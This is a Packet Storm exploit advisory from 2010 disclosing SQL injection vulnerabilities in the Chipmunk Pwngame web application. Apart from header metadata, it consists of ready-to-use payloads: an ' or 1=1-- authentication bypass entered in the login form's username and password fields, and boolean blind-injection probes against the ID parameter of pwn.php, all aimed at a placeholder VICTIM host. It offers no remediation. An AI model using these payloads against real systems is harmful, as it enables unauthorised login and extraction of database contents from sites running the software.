Chipmunk Pwngame SQL Injection

2010-10-11T00:00:00
ID PACKETSTORM:94569
Type packetstorm
Reporter KnocKout
Modified 2010-10-11T00:00:00

Description

                                        
                                            `===================================================  
Chipmunk Pwngame <= Multiple SQL() Vulnerabilities  
===================================================  
~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockoutr@msn.com  
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB  
{ H4X0RE SECURITY PROJECT }  
AQ. "Rüyalarýma bitek Uyuyoken kavuþuyosam Anladýmki Ölmekte zor deðil.."  
~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~Web App. : Chipmunk Pwngame  
~Software: http://www.chipmunk-scripts.com/page.php?ID=34  
~Vulnerability Style : SQL Vulnerabilities  
-----------  
~Demo: http://www.chipmunk-scripts.com/pwngame/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
~~~~~~~~ Explotation| Auth bypass() ~~~~~~~~~~~  
http://VICTIM/Path/login.php  
Username : ' or 1=1-- -H4x0reSEC  
Password : ' or 1=1-- -H4x0reSEC  
================================  
~~~~~~~~ Explotation| Blind SQL Inj() ~~~~~~~~~~~  
http://VICTIM/Path/pwn.php?ID=1 [Blind]  
http://VICTIM/Path/pwn.php?ID=1 and 1=0  
http://VICTIM/Path/pwn.php?ID=1 and 1=1  
================================  
  
  
`